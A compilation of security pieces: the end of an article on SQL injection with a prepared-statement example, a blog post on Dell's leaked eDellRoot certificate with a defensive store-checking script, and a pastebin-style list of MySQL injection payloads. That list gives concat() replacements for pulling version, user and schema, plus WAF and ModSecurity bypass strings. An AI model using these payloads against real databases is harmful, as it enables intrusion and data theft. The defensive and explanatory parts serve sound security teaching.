So just as script kiddies continue to share their SQLi on YouTube, there is parallel information sharing going on with website developers. “We've got this ability for anyone to stand up, and share their knowledge, and not always get it right,” Hunt said.

Ultimately, the responsibility of the security of these sites, and the data they contain, boils down to web developers themselves. That means SQLi and the breaches it causes will remain, at least for a little while longer.

Source: http://motherboard.vice.com/read/the-history-of-sql-injection-the-hack-that-will-never-go-away
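An added example (not from the article or anyone quoted in it) that shows the prepared-statement point Shema makes, on a constructed SQLite table served by a Hunt-style `id=` parameter: the string-built query lets hostile input rewrite the WHERE clause and surface the unpublished row, while the bound-parameter version keeps the query's structure fixed and returns nothing for the same input. The table, its rows and the function names are assumptions for the example.

```python
"""Vulnerable string-built query beside its prepared-statement replacement,
run against an in-memory SQLite table. Constructed data; not code from the
article or from any of the people quoted in it."""
import sqlite3


def make_db():
    """Constructed 'news articles' table; only published rows should ever be served."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)")
    conn.executemany("INSERT INTO articles VALUES (?, ?, ?)", [
        (1, "Public story", 1),
        (2, "Second story", 1),
        (3, "Embargoed draft", 0),
    ])
    return conn


def article_vulnerable(conn, article_id):
    """The request parameter is pasted into the SQL text, so it can carry syntax:
    'AND id = 1 OR 1=1' turns the published filter into a no-op."""
    sql = "SELECT id, title FROM articles WHERE published = 1 AND id = " + article_id
    return conn.execute(sql).fetchall()


def article_prepared(conn, article_id):
    """Prepared statement: the query's structure is fixed at parse time and the
    parameter is bound as data, so '1 OR 1=1' is just a string that matches no id."""
    sql = "SELECT id, title FROM articles WHERE published = 1 AND id = ?"
    return conn.execute(sql, (article_id,)).fetchall()


def article_validated(conn, article_id):
    """Defence in depth: type-check the parameter before it gets anywhere near SQL."""
    try:
        numeric_id = int(article_id)
    except ValueError:
        return []
    return article_prepared(conn, numeric_id)


if __name__ == "__main__":
    conn = make_db()
    normal, hostile = "1", "1 OR 1=1"      # constructed request parameters
    print("vulnerable, normal input: ", article_vulnerable(conn, normal))
    print("vulnerable, hostile input:", article_vulnerable(conn, hostile))
    print("prepared,   hostile input:", article_prepared(conn, hostile))
    print("validated,  hostile input:", article_validated(conn, hostile))
```

The prepared version alone stops the injection; the validation wrapper is there because rejecting non-numeric ids early also gives you a clean place to log attempts.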
24. Superfish 2.0: Dangerous Certificate on Dell Laptops breaks encrypted HTTPS Connections

tl;dr Dell laptops come preinstalled with a root certificate and a corresponding private key. That completely compromises the security of encrypted HTTPS connections. I've provided an online check, affected users should delete the certificate.

It seems that Dell hasn't learned anything from the Superfish scandal earlier this year: laptops from the company come with a preinstalled root certificate that will be accepted by browsers. The private key is also installed on the system and has now been published. Therefore attackers can use Man-in-the-Middle attacks against Dell users to show them manipulated HTTPS web pages or read their encrypted data.

The certificate, which is installed in the system's certificate store under the name "eDellRoot", gets installed by a software package called Dell Foundation Services. This software is still available on Dell's web page. According to the somewhat unclear description from Dell it is used to provide "foundational services facilitating customer serviceability, messaging and support functions".

The private key of this certificate is marked as non-exportable in the Windows certificate store. However, this provides no real protection: there are tools to export such non-exportable certificate keys. A user of the platform Reddit has posted the key there.

For users of the affected laptops this is a severe security risk. Any attacker can use this root certificate to create valid certificates for arbitrary web pages. Even HTTP Public Key Pinning (HPKP) does not protect against such attacks, because browser vendors allow locally installed certificates to override the key pinning protection. This is a compromise in the implementation that allows the operation of so-called TLS interception proxies.

I was made aware of this issue a while ago by Kristof Mattei. We asked Dell for a statement two weeks ago and didn't get any answer.
It is currently unclear which purpose this certificate served. However, it seems unlikely that it was placed there deliberately for surveillance purposes; in that case Dell wouldn't have installed the private key on the system.

Affected are only users of browsers or other applications that use the system's certificate store. Among the common Windows browsers this affects Internet Explorer, Edge and Chrome. Firefox users are not affected: Mozilla's browser has its own certificate store.

Users of Dell laptops can check if they are affected with an online check tool. Affected users should immediately remove the certificate in the Windows certificate manager. The certificate manager can be started by clicking "Start" and typing in "certmgr.msc". The "eDellRoot" certificate can be found under "Trusted Root Certification Authorities".

This incident is almost identical to the Superfish incident. Earlier this year it became public that Lenovo had preinstalled a software called Superfish on its laptops. Superfish intercepts HTTPS connections to inject ads. It used a root certificate for that and the corresponding private key was part of the software. After that incident several other programs with the same vulnerability were identified; they all used a software module called Komodia. Similar vulnerabilities were found in other software products, for example in Privdog and in the ad blocker Adguard.

This article is mostly a translation of a German article I wrote for Golem.de. Image source and license: Wistula / Wikimedia Commons, Creative Commons by 3.0

Source: https://blog.hboeck.de/archives/876-Superfish-2.0-Dangerous-Certificate-on-Dell-Laptops-breaks-encrypted-HTTPS-Connections.html
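An offline check for the affected-store question above, added here as an example and not part of the blog post or of Dell's tooling: it parses the text that Windows' `certutil -store Root` prints and flags any root whose subject CN is on a watchlist. The watchlist holds only "eDellRoot", the name the article gives; the sample store listing below is constructed (serial numbers, dates and hashes are made up) so the script runs without a Windows machine.

```python
import re

# Constructed sample of `certutil -store Root` output. Serial numbers, dates and
# hashes are made up; only the eDellRoot subject name comes from the article.
SAMPLE_CERTUTIL_OUTPUT = """\
Root "Trusted Root Certification Authorities"
================ Certificate 0 ================
Serial Number: 6bb0a5d8a4a0b5de1234567890abcdef
Issuer: CN=eDellRoot
 NotBefore: 4/7/2015 11:23 AM
 NotAfter: 4/7/2039 11:23 AM
Subject: CN=eDellRoot
Signature matches Public Key
Root Certificate: Subject matches Issuer
Cert Hash(sha1): 00 11 22 33 44 55 66 77 88 99 aa bb cc dd ee ff 00 11 22 33
================ Certificate 1 ================
Serial Number: 0123456789abcdef0123456789abcdef
Issuer: CN=Example Public Root CA, O=Example Inc, C=US
 NotBefore: 1/1/2010 12:00 AM
 NotAfter: 1/1/2030 12:00 AM
Subject: CN=Example Public Root CA, O=Example Inc, C=US
Signature matches Public Key
Root Certificate: Subject matches Issuer
Cert Hash(sha1): ff ee dd cc bb aa 99 88 77 66 55 44 33 22 11 00 ff ee dd cc
CertUtil: -store command completed successfully.
"""

CERT_HEADER = re.compile(r"^=+\s*Certificate (\d+)\s*=+$")
FIELDS = ("Serial Number", "Issuer", "Subject")

def parse_certutil_store(text):
    """Split certutil -store output into one dict per certificate entry."""
    certs = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        header = CERT_HEADER.match(line)
        if header:
            current = {"index": int(header.group(1))}
            certs.append(current)
            continue
        if current is None:
            continue  # banner lines before the first certificate
        for field in FIELDS:
            prefix = field + ":"
            if line.startswith(prefix):
                current[field.lower().replace(" ", "_")] = line[len(prefix):].strip()
    return certs

def common_name(dn):
    """Pull the CN out of a certutil-style distinguished name string."""
    m = re.search(r"(?:^|,\s*)CN=([^,]+)", dn)
    return m.group(1).strip() if m else None

# Root CN named in the article; extend with other vendor-injected roots as needed.
KNOWN_BAD_ROOT_CNS = frozenset({"eDellRoot"})

def find_bad_roots(text, bad_cns=KNOWN_BAD_ROOT_CNS):
    """Return the store entries whose subject CN is on the watchlist."""
    hits = []
    for cert in parse_certutil_store(text):
        cn = common_name(cert.get("subject", ""))
        if cn in bad_cns:
            hits.append({"index": cert["index"], "cn": cn,
                         "serial_number": cert.get("serial_number")})
    return hits

if __name__ == "__main__":
    for hit in find_bad_roots(SAMPLE_CERTUTIL_OUTPUT):
        print("untrusted root present: certificate %d CN=%s serial=%s"
              % (hit["index"], hit["cn"], hit["serial_number"]))
```

On a real machine, run `certutil -store Root` (machine store) and `certutil -user -store Root` (current-user store) and feed the output to `find_bad_roots`; a hit should then be removed with certmgr.msc as the article describes, or with `certutil -delstore Root eDellRoot`. Matching on the subject name only is deliberate: it is the one identifier the article gives, and an attacker who already has the leaked key gains nothing from the check, so there is no need to pin a hash here.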
25. mysql injection concat() replacements

@sergey_lakantar

Note on the `--1` and `--3` arguments below: MySQL only treats `--` as a comment when it is followed by whitespace, so `length(x)--1` is parsed as `length(x) - (-1)`, i.e. `length(x)+1`. That keeps the payload free of `+` and of spaces while still computing the insert/pad positions.

select export_set(1,version(),user(),' : ',2);
5.1.7 : my_user

select export_set(1,version(),export_set(1,user(),schema(),' : ',2),' : ',2);
5.1.7 : my_user : my_db

select make_set(7,version(),user(),schema());
5.1.7,my_user,my_db

select replace(make_set(7,version(),user(),schema()),',',' : ');
5.1.7 : my_user : my_db

select insert(insert(version(),length(version())--1,0,user()),length(version())--1,0,' : ');
5.1.7 : my_user

select insert(insert(schema(),length(schema())--1,0,insert(insert(version(),length(version())--1,0,user()),length(version())--1,0,' : ')),length(schema())--1,0,' : ');
5.1.7 : my_user : my_db

select replace(replace(replace('!?$','!',version()),'?',' : '),'$',user());
5.1.7 : my_user

select replace(replace(replace(replace('!?$?^','!',version()),'?',' : '),'$',user()),'^',schema());
5.1.7 : my_user : my_db

select lpad(lpad(user(),@x:=length(user())--3,' : '),@x--length(version()),version());
5.1.7 : my_user

select lpad(lpad(lpad(lpad(schema(),@x:=length(schema())--3,' : '),@x--length(user()),user()),@x--length(user())--3,' : '),@x--length(user())--3--length(version()),version());
5.1.7 : my_user : my_db

select rpad(rpad(version(),@x:=length(version())--3,' : '),@x--length(user()),user());
5.1.7 : my_user

select rpad(rpad(rpad(rpad(version(),@x:=length(version())--3,' : '),@x--length(user()),user()),@x--length(user())--3,' : '),@x--length(user())--3--length(schema()),schema());
5.1.7 : my_user : my_db

group_concat() without comma:

select (select group_concat(a separator ' : ') from (select version()a union select user() union select schema())x);
5.1.7 : my_user : my_db

concat() waf bypass:

/*!50000group_coNcat(*/)
/*!50000coNcat(*/)
`coNcat`%0a%0b%0c%0d%a0()
{snoopdogg concat()}
{s {n {o {o {p {d {o {g {g`coNcat`()}}}}}}}}}
{s {n {o {o {p {d {o {g {g`coNcat`/*!50000(*/)}}}}}}}}}
{s {n {o {o {p {d {o {g {g`coNcat`/*!50000 /*! /*!40000 /*! /*!(*/((((1 %23aaa%0a )))))}}}}}}}}}
concat-- a%0a()
concat%23aaaaaaaaaa..........%0a(%23aaaaaaa.........%0a)
concat/**x**/()

Modsecurity:

concat+()

Link: concat() replacements - Pastebin.com